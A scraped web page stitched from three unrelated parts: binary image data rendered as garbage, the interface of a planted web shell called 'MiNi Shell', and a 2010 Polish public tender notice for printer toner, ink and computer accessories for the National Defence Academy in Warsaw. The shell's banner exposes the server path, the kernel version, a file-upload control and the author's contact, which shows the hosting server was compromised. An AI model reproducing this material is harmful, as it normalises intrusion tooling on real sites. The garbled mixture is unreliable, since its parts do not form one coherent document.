JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100617/171920-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa akcesoriów komputerowych oraz materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów na potrzeby Akademii Obrony Narodowej</b><br>
<b>Numer ogłoszenia: 171920 - 2010; data zamieszczenia: 17.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Obrony Narodowej , al. Gen. A. Chruściela 103, 00-910 Warszawa, woj. mazowieckie, tel. 022 6813780, faks 022 6813175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aon.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa akcesoriów komputerowych oraz materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów na potrzeby Akademii Obrony Narodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> TONER DO  DRUKARKI AP2600N LASERPRINTER RICOH 	szt.	2
TONER DO DRUKARKI BIZHUB 250	szt.	12
TONER DO DRUKARKI HP COLOR JET 3500	szt.	2
TONER DRUKARKI HP COLOR LASER JET 2800 Z USB	szt.	2
TONER DO DRUKARKI HP LASERJET 3150	szt.	2
TONER DO DRUKARKI HP LJ 4200 	szt.	2
TUSZ  DO DRUKARKI HP OFFICEJET 1150C	szt.	2
TUSZ DO DRUKARKI HP PRO 1170C 	szt.	4
TONER DO DRUKARKI HP-4	szt.	2
TAŚMA DO DRUKARKI IGŁOWA SP40	szt.	14
TONER DO DRUKARKI LASEROWEJ HP 2100	szt.	6
TONER DO DRUKARKI LASEROWEJ HP 6P 	szt.	50
TONER DO DRUKARKI LASEROWEJ KOLOR 4500C	szt.	1
TONER DO DRUKARKI MINOLTA DI 2510	szt.	6
TONER  DO DRUKARKI MINOLTA PAGEPRO	szt.	2
TONER DO DRUKARKI XEROX DOCUCOLOR 4LP	szt.	2
TONER DO DRUKARKI-KOP.KONICA-MINOLTA BIZHUB 222 SET	szt.	6
TONER DO KOPIARKI CANON NP-6317	szt.	4
TONER DO KOPIARKI GESTETNER 1502	szt.	2
TONER DO KOPIARKI GESTETNER 1802D H 6836902387	szt.	2
TONER DO KOPIARKI GESTETNER TYP 2706	szt.	2
TONER DO KOPIARKI MITA DC 2360	szt.	2
TONER DO KOPIARKI OCE 3018	szt.	2
TONER DO KOPIARKI OCE TYP3045	szt.	2
TONER DO KOPIARKI PANASONIC DP-1520	szt.	2
TONER DO KOPIARKI RICOCH AFICO-200	szt.	4
TONER DO KOPIARKI TOSHIBA 1550	szt.	2
TONER DO KSEROKOP.A3 XEROX COPY CENTER C118 	szt.	2
TONER DO KSEROKOPIARKI A-3 KYOCERA MITA KM-1620	szt.	10
TONER DO KSEROKOPIARKI A3 XEROX COPY CENTER C118 DUPLEX/	szt.	2
TONER DO KSEROKOPIARKI CANON NP-6112	szt.	2
TONER DO KSEROKOPIARKI CYFROWA SHARP-ARM-205 45040843 	szt.	2
TONER DO KSEROKOPIARKI MITA DC-1860	szt.	2
TONER DO KSEROKOPIARKAIRICOH AFICO 220	szt.	2
TONER DO KSEROKOPIARKI TOSHIBA 1550 	szt.	2
TONER DO TELEFAXU UF-595	szt.	2
TONER DO TELEFAXU HARRIS - 3M - 2250	szt.	2
TONER DO URZĄDZENIA HP LASERJET M2727NFS	szt.	2
TONER DO DRUKARKI 1100 	szt.	100
TONER DO DRUKARKI 1100A 	szt.	50
TUSZ  DO DRUKARKI 1120 	szt.	6
TUSZ  DO DRUKARKI 1120C	szt.	5
TONER DO DRUKARKI 6L 	szt.	25
TUSZ DO DRUKARKI 820 	szt.	1
TUSZ DO DRUKARKI 890C	szt.	2
TUSZ DO DRUKARKI 895CXI 	szt.	23
TUSZ DO DRUKARKI A-3 1280D 	szt.	1
TUSZ DO DRUKARKI ATRAM.HP DJ 5550	szt.	1
TONER DO DRUKARKI BROTHER HL 5250 DN 	szt.	50
TONER DO DRUKARKI COLOR HP LJ 2550 LN 	szt.	10
TONER DO DRUKARKI COLOR HP LJ 2550 N 	szt.	2
TUSZ DO DRUKARKI HEWLETT PACKARD DJ 710C	szt.	2
TONER DO DRUKARKI HP - 5L 	szt.	6
TUSZ  DO DRUKARKI HP 750 	szt.	11
TUSZ DO DRUKARKI HP 895C 	szt.	4
TUSZ DO DRUKARKI HP 960 C 	szt.	22
TUSZ DO DRUKARKI HP BUSINESS JNKJET 1200D	szt.	4
TONER DO DRUKARK HP COLOR LASERJET 3600 	szt.	6
TUSZ DO DRUKARKI HP DESK JET 1125C	szt.	5
TUSZ DO DRUKARKI HP DESK JET 340 CBI 	szt.	1
TUSZ DO DRUKARKA HP DESKET JET 930C 	szt.	6
TUSZ DO DRUKARKI HP DESKET JET 950C 	szt.	1
TUSZ DO DRUKARKI HP DESKJET 1220C 	szt.	1
TUSZ DO DRUKARKI HP DESKJET 350 	szt.	1
TUSZ DO DRUKARKI HP DESKJET 5655	szt.	10
TUSZ DO DRUKARKI HP DESKJET 9300 A3+ 	szt.	3
TUSZ DO DRUKARKI HP DJ 1120 	szt.	1
TUSZ DO DRUKARKI HP DJ 5652 	szt.	1
TUSZ DO DRUKARKI HP DJ 6980 	szt.	1
TUSZ DO DRUKARKI HP DJ 840C	szt.	22
TUSZ DO DRUKARKI HP DJ 9650	szt.	1
TUSZ DO DRUKARKI HP DJ 970 	szt.	4
TUSZ DO DRUKARKI HP INKJET CP 1700 	szt.	12
TONER DO DRUKARKI HP LASER JET 1200	szt.	180
TONER DO DRUKARKI HP LASER JET 3200 	szt.	2
TONER DO DRUKARKI HP LASER JET 4L 	szt.	2
TONER DO DRUKARKAIHP LASERJET 2015 	szt.	20
TONER DO DRUKARKI HP LASERJET 2300D	szt.	30
TONER DO DRUKARKI HP LASERJET 2300N 	szt.	4
TONER DO DRUKARKI HP LJ 1018 	szt.	2
TONER DO DRUKARKI HP LJ 1220 	szt.	15
TONER DRUKARKI HP LJ 1300 	szt.	7
TONER DO DRUKARKI HP  6P 	szt.	4
TONER DO DRUKARKI HP -4 	szt.	2
TUSZ DO DRUKARKI HP OFFICE JET G85 	szt.	7
TUSZ DO DRUKARKI HP OFFICEJET 7130 	szt.	1
TUSZ DO DRUKARKI HP OFFICEJET 7210 	szt.	1
TUSZ DO DRUKARKI HP OFFICEJET 750	szt.	2
TUSZ DO DRUKARKI HP OFFICEJET PSC 6110 NR MU48PJ313R 	szt.	1
TUSZ DO DRUKARKA HP OJ PSC 1315 COPYSCAN(USB) 	szt.	8
TUSZ DO DRUKARKA HP PHOTO SMART 8750	szt.	2
TUSZ DO DRUKARKI HP PHOTOSMART 7150 	szt.	2
TONER DO DRUKARKI HP-LASERJER 3150 	szt.	8
TUSZ DO DRUKARKI HP-OFFICEJET T65PL 	szt.	6
TUSZ DO DRUKARKI HP-OFFICET JET R65 	szt.	1
TUSZ DO DRUKARKI HP-OFFICJET G55 	szt.	6
TONER DO DRUKARKI LASER HP  1020 	szt.	65
TONER DO DRUKARKI LASEROWEJ KOLOR KM 2550DN	szt.	2
TONER DO DRUKARKI LASEROWEJ KOLOR KM U2550DN 	szt.	2
TONER DO DRUKARKI LASEROWEJ MINOLTA 5650 	szt.	10
TONER DO DRUKARKI LEXMARK E240N 	szt.	50
TUSZ DO DRUKARKI OFFICE-JET HP 1210 	szt.	2
TUSZ DO DRUKARKI OFFICE-JET HP 3020 	szt.	2
TONER DO DRUKARKAIOKI B4250 	szt.	7
TAŚMA DRUKARKA OKI ML-3320 10 	szt.	3
TUSZ DO DRUKARKI PSC HP 1510 	szt.	3
TUSZ DO DRUKARKI R45 	szt.	10
TONER DO TELEFAKSA LASEROWEGO  KX-FL 613	szt.	14
TONER DO TELEFAX KX-FL503	szt.	4
TONER DO TELEFAXU LASEROWEGO KX-FLM653	szt.	2
TONER TELEFAXU PANASONIC KX-FLB 758PD	szt.	2
TONER DO TELEFAXU PANASONIC KX-FLB 758	szt.	8
TONER DO URZĄDZ.WIELOFUNK.BROTHER MFC -7840W	szt.	10
TONER DO URZĄDZENIA HP LASER JET 3050	szt.	10
TONER DO URZĄDZENIA WIELOFUNKCYJNEGO  HPM1005MP	szt.	8
TONER DO KSEROKOPIARKI A3 XEROX C118 Z DUPLEXEM	szt.	2
TONER DO KSEROKOPIARKI A3 XEROX COPY CENTER C118	szt.	6
TONER  DO KSEROKOPIARKAIA-4 KYOCEA MITA KM-1500	szt.	20
TONER DO KSEROKOPIARKI A4 XEROX PHASER 3200 MFP	szt.	20
TONER DO KSEROKOPIARKAI CANON NP-6112 NR 45127	szt.	2
TONER DO KSEROKOPIARKI CANON NP-6512 NR 19558	szt.	6
BĘBEN  DO  TELEFAXU  PANASONIC KX-FLB 758	szt.	3
BĘBEN DO DRUKARKI LEXMARK E240N Licznik	szt.	10
BĘBEN DO KSEROKOPIARKI A3 XEROX COPY CENTER C118	szt.	3
Klawiatura komputerowa interfejs: USB, kolor: czarny, Kabel min 1.4 m, gwarancja min 2 lata producenta,	szt.	30
Mysz komputerowa (optyczna, interfejs: USB i PS/2 rozdzielczość min : 1000dpi  kabel min 1.5 m liczba przycisków: 3 szt. liczba rolek: 1 szt. kolor: czarna, gwarancja 3 lata producenta)	szt.	60
Baterie R6 AA alkaliczne	szt.	1000
Akumulatory R6 AA min 1800mAh 	szt.	100
Zestaw płyn do czyszczenia monitorów LCD min 150 ml + ściereczka	szt.	20
Pianka do czyszczenia obudów sprzętu komputerowego min 400ml	szt.	40.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.00-2, 30.12.51.10-5, 31.12.51.20-8, 32.58.20.00-6, 30.23.70.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium  w wysokości : 4000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę musi wykazać że: zrealizował jako strona umowy, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, dwie umowy na dostawy odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia, przy czym wartość tych dostaw  (umów) była nie mniejsza niż 60.000,00 zł brutto, oraz złoży dokumenty potwierdzające, że dostawy te zostały wykonane należycie (np. referencje lub inne dokumenty potwierdzające).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena spełniania warunków nastąpi na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, metodą spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aon.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres jak na wstępie, budynek nr 4 pokój 128. Koszt SIWZ - 6,40 PLN. + koszty wysyłki. SIWZ pobrana ze strony internetowej Zamawiającego jest bezpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2010 godzina 10:30, miejsce: Oferty należy składać w siedzibie Zamawiającego, adres jak na wstępie w Kancelarii Jawnej AON - budynek nr 4 - pokój nr 115 (I piętro) do dnia 28-06-2010 r. do godz.10.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com